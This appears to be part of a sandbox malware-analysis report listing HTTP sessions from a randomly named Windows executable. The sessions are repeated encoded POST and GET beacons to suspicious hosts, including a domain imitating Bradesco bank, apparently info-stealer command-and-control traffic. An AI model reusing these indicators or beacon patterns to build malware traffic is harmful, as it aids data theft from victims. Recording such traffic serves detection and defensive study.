54 6c 35 38 63 31 42 54 49 43 74 33 47 34 68 59 6f 34 76 32 47 41 76 43 32 34 4a 4d 66 4e 6b 4a 6d 46 50 39 4b 32 35 33 6c 4d 74 46 6c 46 39 42 46 77 79 78 54 72 6c 67 66 4d 61 79 4a 36 44 73 39 36 30 70 61 4a 56 4b 68 61 56 4c 6f 36 66 32 4b 31 50 64 32 6b 59 64 57 70 74 66 48 50 79 55 2f 36 75 47 73 73 47 32 65 4f 72 62 75 4f 61 63 4b 77 64 45 3d Data Ascii: 1Dd0AZ=wJvfuQhmb5ecuNzeVHRMp9NmImt1YHUsVmA5/ySRyXv7w6AQQAXaK3dvtxWtocmnt5NG2DLT+oXpnBIRDTsTl58c1BTICt3G4hYo4v2GAvC24JMfNkJmFP9K253lMtFlF9BFwyxTrlgfMayJ6Ds960paJVKhaVLo6f2K1Pd2kYdWptfHPyU/6uGssG2eOrbuOacKwdE=
Oct 9, 2024 16:29:25.319991112 CEST	406	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Oct 2024 14:29:25 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cs0724sd92jj.cloud/tma8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49988	119.28.49.194	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:26.977155924 CEST	800	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 74 6a 65 61 47 52 4d 67 39 4e 6c 48 47 74 31 52 6e 55 6f 56 6d 4d 35 2f 77 2b 42 79 45 62 37 77 65 45 51 52 42 58 61 4e 33 64 76 6c 52 57 73 6e 38 6d 53 74 34 77 35 32 42 50 54 2b 6f 72 70 6e 41 34 52 44 41 45 51 6b 70 39 36 38 68 54 4f 66 64 33 47 34 68 59 6f 34 76 4b 34 41 73 79 32 35 35 63 66 4e 46 4a 6c 4d 76 39 4a 68 4a 33 6c 49 74 46 66 46 39 42 7a 77 32 78 31 72 6e 49 66 4d 65 36 4a 36 58 77 2b 7a 30 70 63 48 31 4c 45 54 57 36 55 36 64 6d 33 34 4a 51 77 37 4a 74 41 6f 62 79 74 56 51 63 58 70 4f 71 55 38 56 2b 70 66 62 36 48 55 35 4d 36 75 4b 53 67 64 70 58 32 59 4a 52 6b 44 38 47 77 2b 37 79 4b 64 37 39 71 Data Ascii: 1Dd0AZ=wJvfuQhmb5ecutjeaGRMg9NlHGt1RnUoVmM5/w+ByEb7weEQRBXaN3dvlRWsn8mSt4w52BPT+orpnA4RDAEQkp968hTOfd3G4hYo4vK4Asy255cfNFJlMv9JhJ3lItFfF9Bzw2x1rnIfMe6J6Xw+z0pcH1LETW6U6dm34JQw7JtAobytVQcXpOqU8V+pfb6HU5M6uKSgdpX2YJRkD8Gw+7yKd79q
Oct 9, 2024 16:29:27.854630947 CEST	406	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Oct 2024 14:29:27 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cs0724sd92jj.cloud/tma8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49989	119.28.49.194	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:29.524072886 CEST	1817	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 74 6a 65 61 47 52 4d 67 39 4e 6c 48 47 74 31 52 6e 55 6f 56 6d 4d 35 2f 77 2b 42 79 45 44 37 77 74 4d 51 52 69 2f 61 4d 33 64 76 76 78 57 70 6e 38 6d 31 74 35 5a 77 32 42 53 6f 2b 75 76 70 6d 6a 67 52 58 68 45 51 74 70 39 36 2b 68 54 50 43 74 32 45 34 68 49 73 34 76 36 34 41 73 79 32 35 2f 77 66 4c 55 4a 6c 4b 76 39 4b 32 35 32 33 4d 74 45 52 46 39 35 4e 77 32 30 4f 6f 58 6f 66 43 66 47 4a 37 6b 59 2b 79 55 70 65 45 31 4c 6d 54 57 32 78 36 64 37 47 34 4a 4d 57 37 4f 5a 41 6c 4d 43 37 45 51 63 65 31 73 2b 43 35 69 48 4b 47 64 47 55 53 70 6f 33 79 59 4f 6d 41 59 76 64 54 4d 4a 44 44 59 54 47 76 74 4b 70 4c 64 51 67 39 65 78 49 75 69 50 33 41 5a 73 56 71 71 4a 71 38 36 50 57 6c 67 76 71 46 6d 70 55 59 6b 41 66 2b 6a 56 4d 6c 6c 71 2b 78 31 4c 48 48 55 65 73 61 51 66 44 4e 34 30 64 33 74 52 30 4d 66 4c 55 65 45 66 37 47 33 72 2f 6e 6a 74 35 49 56 6d 4a 33 6b 2f 66 46 61 49 6b 50 6a 4b 32 59 74 63 70 32 74 48 4d 61 31 4e 69 43 39 65 4f 32 35 4f [TRUNCATED] Data Ascii: 1Dd0AZ=wJvfuQhmb5ecutjeaGRMg9NlHGt1RnUoVmM5/w+ByED7wtMQRi/aM3dvvxWpn8m1t5Zw2BSo+uvpmjgRXhEQtp96+hTPCt2E4hIs4v64Asy25/wfLUJlKv9K2523MtERF95Nw20OoXofCfGJ7kY+yUpeE1LmTW2x6d7G4JMW7OZAlMC7EQce1s+C5iHKGdGUSpo3yYOmAYvdTMJDDYTGvtKpLdQg9exIuiP3AZsVqqJq86PWlgvqFmpUYkAf+jVMllq+x1LHHUesaQfDN40d3tR0MfLUeEf7G3r/njt5IVmJ3k/fFaIkPjK2Ytcp2tHMa1NiC9eO25OJ9e1+UUKS81dvKPfaAvrLigT4qDcCGckmNmIut91G76ROjbq08xOL7O277F6M5HCeLl44Rn6vep53vD8xYWukrrS4Y0JaGkcc2KMd3iForXzovZTdXqm3O5Ck+T50e4eymcLLj49ZMali3D1Eyyp+3f+Jc2qZtzPzc4DKi8mtbykLh8WKMXRR5NL0MvTpNi00YRlM1W7Uuhcb9JWl78729WZedFPgDquvediB/Y89eJLZVVjj8pTsSsk/sp6sclGHQfedLb9S/GAXi8T41bPcxN91Pr9r4oD8Nwsb3Shx4YObwuxui7DxDpqcIZ2coHEVJfSRjnZl0B2/zWra2lovuBEasPW4GmeQ8arAMXqaNiLR5zovFQSbcYkf+I6ExlWA4a+9DtLn/CB1mMHuK2tugCWNwuY11kYwWQMrj6SsSmbDxTTp1qZYPWQWjj+yQw08ftkgIoXi0iQbZn67qndsh8r1vmIgjgM6RHfQECFB/kSP/L4tIF1hF2SSVeFdjRJmkpzlEK7p62/shpdOfar4PYx1/Cq6L8QCXBK/ZQAJRr4cXJeW12gYt96kBlSpoQF+oRrA0EvbR5MuYnU4IaNdpWXq9Wovf+cJWF5IY/L/t9eQpG27+Tove4OF+64IPb6kuKjhniMQ2Alvgl0gdBO1JVJHbT5h2ZgVV [TRUNCATED]
Oct 9, 2024 16:29:30.423749924 CEST	406	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Oct 2024 14:29:30 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cs0724sd92jj.cloud/tma8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49990	119.28.49.194	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:32.068690062 CEST	508	OUT	GET /tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+kNVMrh75Qta+8woV1+WeDNzD8+w4KDRgOL1vrbyIBqcBZw==&-n1P=0hFdS6 HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:29:32.971744061 CEST	558	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Oct 2024 14:29:32 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cs0724sd92jj.cloud/tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+kNVMrh75Qta+8woV1+WeDNzD8+w4KDRgOL1vrbyIBqcBZw==&-n1P=0hFdS6 Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49991	72.14.178.174	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:38.319178104 CEST	792	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 39 76 7a 42 79 7a 62 46 5a 58 57 59 71 78 4b 59 37 33 7a 46 6a 62 48 48 37 46 4b 67 6c 75 5a 4d 32 46 63 77 31 63 4e 5a 63 2f 30 2f 63 72 6d 37 49 47 71 48 79 47 33 53 35 59 70 57 2f 51 38 58 30 72 4d 4f 6b 66 66 6a 53 54 4a 30 65 2b 4b 54 48 6d 78 74 71 58 34 37 70 6f 67 57 62 6e 63 30 75 4c 49 62 69 45 44 69 34 76 69 6f 52 75 43 47 47 4d 5a 57 68 44 75 6a 59 79 70 63 45 72 52 44 75 78 4b 65 66 2f 6e 35 49 30 44 37 46 4e 2f 47 75 39 39 63 69 62 75 44 4d 39 64 48 6c 78 58 74 2b 4b 52 51 68 7a 55 75 58 43 58 4a 5a 44 6f 35 64 69 59 62 6b 69 49 78 74 30 45 3d Data Ascii: 1Dd0AZ=/Uwh8kvFWO7R9vzByzbFZXWYqxKY73zFjbHH7FKgluZM2Fcw1cNZc/0/crm7IGqHyG3S5YpW/Q8X0rMOkffjSTJ0e+KTHmxtqX47pogWbnc0uLIbiEDi4vioRuCGGMZWhDujYypcErRDuxKef/n5I0D7FN/Gu99cibuDM9dHlxXt+KRQhzUuXCXJZDo5diYbkiIxt0E=
Oct 9, 2024 16:29:38.892666101 CEST	815	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Wed, 09 Oct 2024 14:29:38 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd e7 57 50 0e 99 76 26 e6 cb 24 b6 1b 94 4e e2 26 fe 18 62 37 9e c4 36 be 64 84 a4 18 11 21 11 10 60 a6 d3 ff 5e c0 99 98 8e db 43 75 40 da 65 df db dd b7 20 e7 d3 f7 f9 f0 d1 fb 71 ab 04 32 62 57 27 4e bd 29 0c f2 2d 50 09 57 af 4e 94 6a 39 01 81 78 7f 6c cc 88 48 a8 a0 00 26 29 91 40 7d 7a bc eb f4 df 23 0f af 03 29 e3 0e 79 cb 68 0e d4 5d 27 83 1d 24 a2 18 4a ea 33 a2 2a 48 70 49 78 85 9d dc 02 82 b7 e4 08 cd 61 44 80 9a 53 52 c4 22 91 2d 40 41 b1 0c 00 26 39 45 a4 d3 18 67 0a e5 54 52 c8 3a 29 82 8c 00 53 33 da 74 92 4a 46 ae 1c 7d bf 37 ed 34 45 72 91 a2 84 c6 f2 d0 d6 df 6b 4f c8 4b 42 d2 a0 55 82 71 99 25 0c d4 fd 7d d5 f5 a2 28 7a 86 86 18 ad da 21 7e 02 31 49 91 d0 04 67 94 13 5d 55 f4 03 bd a3 1f a7 74 1a 25 db 52 1d a7 3b ff ff 74 8e 7e 18 98 e3 0b 5c 2a 55 41 02 62 a0 62 f1 bc 3f 7e fe d2 16 69 2f 85 22 cb b8 52 5d 92 9d d4 43 98 c3 bd b7 15 57 2b f4 92 71 24 a9 e0 4a 8b 4a f9 f9 a1 6b 1d 52 af 82 72 2c 0a 4d 8a 58 63 02 [TRUNCATED] Data Ascii: 26FTMs0WPv&$N&b76d!`^Cu@e q2bW'N)-PWNj9xlH&)@}z#)yh]'$J3HpIxaDSR"-@A&9EgTR:)S3tJF}74ErkOKBUq%}(z!~1Ig]Ut%R;t~\UAbb?~i/"R]CW+q$JJkRr,MXcUs\%\!6iV,=omc0MNHmH95QJ]z)Gb246f=eE1wqf)\-3<ZRn/s?~ck`Bff}cLB#4xf{*Ro}S#zE[vNFf:;b[aV<~]qz+L)7=hn=A~\|uWK0wc}y@cZ>,Go^977o;)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49992	72.14.178.174	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:40.873284101 CEST	812	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 73 38 72 42 77 51 44 46 65 33 57 62 32 68 4b 59 69 6e 7a 42 6a 62 44 48 37 45 4f 77 6d 64 74 4d 32 6e 45 77 30 64 4e 5a 66 2f 30 2f 55 4c 6d 2b 58 57 71 79 79 47 37 77 35 63 70 57 2f 54 41 58 30 71 38 4f 6b 6f 72 67 54 44 4a 79 47 4f 4b 64 49 47 78 74 71 58 34 37 70 70 52 78 62 6d 30 30 75 66 4d 62 6a 67 76 39 6d 66 69 72 57 75 43 47 43 4d 5a 53 68 44 75 46 59 32 77 35 45 74 64 44 75 77 36 65 65 75 6e 36 52 45 44 39 4c 74 2b 4d 6d 75 45 6a 36 4e 65 2f 4a 73 59 59 77 41 6e 77 2f 38 38 36 37 52 63 47 45 69 37 78 4a 51 67 4f 4d 53 35 79 2b 42 59 42 7a 6a 51 6f 5a 57 2b 63 5a 69 47 55 42 34 66 56 6d 62 34 76 6a 2f 35 54 Data Ascii: 1Dd0AZ=/Uwh8kvFWO7Rs8rBwQDFe3Wb2hKYinzBjbDH7EOwmdtM2nEw0dNZf/0/ULm+XWqyyG7w5cpW/TAX0q8OkorgTDJyGOKdIGxtqX47ppRxbm00ufMbjgv9mfirWuCGCMZShDuFY2w5EtdDuw6eeun6RED9Lt+MmuEj6Ne/JsYYwAnw/8867RcGEi7xJQgOMS5y+BYBzjQoZW+cZiGUB4fVmb4vj/5T
Oct 9, 2024 16:29:41.389806032 CEST	815	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Wed, 09 Oct 2024 14:29:41 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 06 93 1a 37 28 9d c4 75 fc 31 c4 6e 3c 89 6d 7c c9 08 49 31 22 42 22 20 c0 4c a7 ff bd 7c 64 62 3a 6e 0f d5 01 69 97 7d 6f 77 df 82 ec 0f df 97 a3 07 f7 c7 58 f1 65 c8 ae ce ec 6a 53 18 e4 7b a0 12 ae 5e 9d 29 e5 b2 7d 02 71 73 ac cd 90 48 a8 20 1f c6 09 91 40 7d 7c b8 ed 58 6f 91 c7 d7 be 94 51 87 bc a6 34 03 ea a1 93 c2 0e 12 61 04 25 f5 18 51 15 24 b8 24 bc c4 ce c6 80 e0 3d 39 41 73 18 12 a0 66 94 e4 91 88 65 0b 90 53 2c 7d 80 49 46 11 e9 d4 c6 67 85 72 2a 29 64 9d 04 41 46 80 de ed b5 e9 24 95 8c 5c d9 5a b3 d7 ed d4 45 72 91 a0 98 46 f2 d8 d6 df 6b 8f c9 73 4c 12 bf 55 42 ef 32 8d 19 a8 fa fb aa 69 79 9e 0f 7a 5d c4 68 d9 0e f1 62 88 49 82 44 57 70 46 39 d1 54 45 3b d2 db da 69 4a bb 56 b2 2d d5 69 ba 8b ff 4f 67 6b c7 81 d9 9e c0 85 52 16 24 20 06 2a 16 4f cd f1 e3 a7 b6 48 8d 14 8a 2c a2 52 75 49 0e 52 0b 60 06 1b 6f 2b ae 52 e8 39 e5 48 52 c1 95 16 95 f2 f3 5d d7 2a a4 5a 39 e5 58 e4 5d 29 a2 2e 13 [TRUNCATED] Data Ascii: 26FTMs0WPv67(u1n<m\|I1"B" L\|db:ni}owXejS{^)}qsH @}\|XoQ4a%Q$$=9AsfeS,}IFgr)dAF$\ZErFksLUB2iyz]hbIDWpF9TE;iJV-iOgkR$ OH,RuIR`o+R9HR]*Z9X]).]lNz_"#IHS>0,2up2}8B$~>(\|KzM>FPgtMbe66n;gVUVn))o_vE"/\|1!"moz@g\|>FMoJ',l6ynorow<DOnd^8&fe%"u1@'<`/fm{!f;t7Lek_/fK \)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49993	72.14.178.174	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:43.603787899 CEST	1829	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 73 38 72 42 77 51 44 46 65 33 57 62 32 68 4b 59 69 6e 7a 42 6a 62 44 48 37 45 4f 77 6d 64 31 4d 33 55 4d 77 30 2b 56 5a 65 2f 30 2f 65 72 6d 2f 58 57 71 72 79 47 7a 30 35 63 6c 67 2f 57 45 58 31 4d 41 4f 69 5a 72 67 61 44 4a 79 50 75 4b 51 48 6d 78 34 71 58 49 42 70 70 68 78 62 6d 30 30 75 5a 67 62 7a 45 44 39 6b 66 69 6f 52 75 43 4b 47 4d 5a 71 68 44 48 77 59 32 39 4d 46 64 39 44 75 51 71 65 63 63 2f 36 4f 30 44 2f 62 39 2f 5a 6d 76 34 43 36 4e 72 54 4a 73 38 2b 77 48 54 77 39 35 56 33 2f 31 4d 4b 56 7a 48 4a 4c 67 55 49 57 43 70 71 7a 6e 4a 30 2f 54 41 31 46 56 71 69 59 32 6e 54 50 62 2b 47 38 2b 49 69 74 36 74 61 58 2f 33 63 6e 4f 54 75 7a 47 73 50 69 46 33 4f 72 62 4e 46 61 61 6e 54 65 79 6e 67 72 54 65 4a 4f 48 61 4e 58 41 6c 71 55 67 2f 65 31 67 41 39 30 59 63 44 49 54 52 6d 33 76 4a 78 74 4e 4b 72 43 4f 7a 72 48 79 33 41 5a 58 78 35 35 61 45 6c 38 49 33 42 77 4c 46 77 50 59 56 35 6b 6a 70 4b 79 6b 4e 50 2b 6f 59 39 67 47 37 7a 51 58 35 [TRUNCATED] Data Ascii: 1Dd0AZ=/Uwh8kvFWO7Rs8rBwQDFe3Wb2hKYinzBjbDH7EOwmd1M3UMw0+VZe/0/erm/XWqryGz05clg/WEX1MAOiZrgaDJyPuKQHmx4qXIBpphxbm00uZgbzED9kfioRuCKGMZqhDHwY29MFd9DuQqecc/6O0D/b9/Zmv4C6NrTJs8+wHTw95V3/1MKVzHJLgUIWCpqznJ0/TA1FVqiY2nTPb+G8+Iit6taX/3cnOTuzGsPiF3OrbNFaanTeyngrTeJOHaNXAlqUg/e1gA90YcDITRm3vJxtNKrCOzrHy3AZXx55aEl8I3BwLFwPYV5kjpKykNP+oY9gG7zQX5AzkvUMtD+2WGRJihRgF1REJoYUVZ3m6ipnvPpgvftH11dax5AslClK5q/Xw3aoKcLVfu5IZW/ToOhwK2Y9GKOtMfokdNHcn5tpjhmdSvBIzbxva8yAP+shMKUDPsFLmh/LESqGlVabsHf9QGUOTZIevsepGbgjjenkZEoi/O5ik/z0wh/CdxVnF48kQTL/GxFzHQcDPnCX0zMY1XztQVJWIhw+tYOmXKZZO5vRVfRgX/UU37Zf5Vfo01JWv/j64h6Ux9bDHoiuGJCe5pK3c27HZDLTuCCxCzb5yprGC2LzMwugP88ReSL5mCgiGBKlpJa7Y1qY3X+LClF63x03q+8okW5gRJeMxL4w6GjPoN5VXVGMa3k17GYmahR7SSqRKNbOaSO8DC4+BpTSNJz58cFm3MTW9QyOdJBVL+/T6HI3uX/etils+H7nDCkBY7ftPgN84v6+B7a1L6LPHa/u+FhyY3PIFJxw/Moe6p536hOdu4dlbNN95uMzu5L1Dvj6Ma+PJDwmDopc9lTKsD0VSYCATLgFrE/T8KOaBzmy4ZEsV4zC5pq0I9NH8Bc40GUXy9MWdQgXb75glZqu93grCstPEdpFxWMrnW3ZZ58SHqL5pvTuTAFBjlr59hEFiuort87BWqj+Shz/7pyFcrmy4YAmwIifv3VOgG/y [TRUNCATED]
Oct 9, 2024 16:29:44.107940912 CEST	815	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Wed, 09 Oct 2024 14:29:44 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 cb 24 31 0d 4a 27 71 13 7f 0c b1 1b 4f 62 1b 5f 32 42 52 8c 88 90 08 08 30 d3 e9 7f 2f e0 4c 4c c7 ed a1 3a 20 ed b2 ef ed ee 5b 90 fb f1 fb 7c f8 e0 ff b8 51 42 19 b3 cb 0f 6e b3 29 0c f2 2d 50 09 57 2f 3f 28 f5 72 43 02 f1 fe d8 9a 31 91 50 41 21 4c 33 22 81 fa f8 70 db 1b bc 45 1e 5e 87 52 26 3d f2 9a d3 02 a8 bb 5e 0e 7b 48 c4 09 94 34 60 44 55 90 e0 92 f0 1a 3b b9 01 04 6f c9 11 9a c3 98 00 b5 a0 a4 4c 44 2a 3b 80 92 62 19 02 4c 0a 8a 48 af 35 be 28 94 53 49 21 eb 65 08 32 02 4c cd e8 d2 49 2a 19 b9 74 f5 fd de b6 d3 16 c9 45 86 52 9a c8 43 5b 7f af 3d 25 cf 29 c9 c2 4e 09 c6 45 9e 32 d0 f4 f7 55 d7 cb b2 3c 37 34 c4 68 dd 0e 09 52 88 49 86 84 26 38 a3 9c e8 aa a2 1f e8 5d fd 38 a5 db 2a d9 95 ea 38 dd e9 ff a7 73 f5 c3 c0 dc 40 e0 4a a9 0b 12 10 03 15 8b a7 fd f1 d3 e7 ae 48 7b 29 14 59 25 b5 ea 92 ec a4 1e c1 02 ee bd 